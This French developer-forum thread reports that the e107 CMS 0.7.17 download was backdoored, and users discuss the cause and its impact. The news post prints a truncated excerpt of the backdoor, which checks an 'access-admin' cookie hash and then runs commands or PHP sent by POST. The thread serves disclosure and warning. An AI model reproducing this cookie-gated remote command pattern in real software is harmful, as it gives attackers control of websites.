# Le club des professionnels en informatique > Actualits >  La dernire version du SGC e107 est backdoore, son lien de tlchargement est compromis

## Katleen Erna

*La dernire version du SGC e107 est backdoore, son lien de tlchargement est compromis*

Certains d'entre vous utilisent peut tre le systme de gestion de contenu open source e107 pour crer ou grer des sites Internet. Disponible selon les termes de la licence GNU, ce SGC propose rgulirement de nouveaux tlchargements et mises  jour. 

Il semblerait que sa dernire version, la 0.7.17 (qui vient de sortir), contienne un PHP Backdoor.

Un spcialiste en scurit informatique ayant tlcharg le fichier a dcouvert l'entre suivante  la ligne numro 1876 de son code source : 




> if(md5($_COOKIE['access-admin']) == "cf1afec15669cb96f09befb7d70f8bcb") {
> 
> ...
> 
> if(!empty($_POST['cmd'])){
> $out = execute($_POST['cmd']);
> }
> 
> elseif(!empty($_POST['php'])){
> ...


(etc.)

Le lien de tlchargement ne serait donc pas fiable. L'internaute a averti e107, et recommande de ne plus tlcharger le fichier en l'attente de leur rponse au problme.

Plus d'informations ici.

----------


## supertonic

Il s'agit d'une faille venant de php donc ? Les sites utilisant php sont galement concerns ?  ::?:

----------


## trenton

> Il s'agit d'une faille venant de php donc ? Les sites utilisant php sont galement concerns ?


Non

----------


## ixpe

> Il s'agit d'une faille venant de php donc ? Les sites utilisant php sont galement concerns ?


Oula...
Non il s agit d un code inser par une personne malveillante dans les sources du cms...

Je l aime bien pourtant ce petit cms... Pas tres connu, je le pensais donc
plus ou moins a l abri des objectifs des pirates.

----------


## khayyam90

La faille vient du code en tlchargement. 
Quiconque installe cette nouvelle version permettra  un attaquant bien inform (qui aura connaissance du cookie  nommer access-admin) d'excuter directement du code systme ou php sur son site.
Une rapide recherche de base de donnes md5 ne m'a pas indiqu la valeur  positionner dans cookie.  ::aie:: 

Grosse grosse faille de scurit.

----------


## bombseb

il est sympas ce CMS mais il m'a pas l'air tres scure...

je l'avais install il y a un moment dja et on me l'avait dja hack  l'poque...

----------


## kaymak

Encore un bel exemple de propagation par les quipes de dveloppement. Qui n'ont pas fait cela exprs.
C'est juste un des mecs ou des serveurs d'hbergement qui s'est fait infect involontairement et qui par rebond a contamin son projet : /

Donc le cms est toujours aussi secure (comme avant quoi pas plus, pas moins). et non, et triple non ce n'est pas une faille du moteur php, ou alors il faut bannir tous les langages de programmation.

Fin, faut tout de mme patcher sa release pour ceux qui ont upgrad, plus encore ceux qui sont en serveur ddi, ou autre rps / vps.

----------

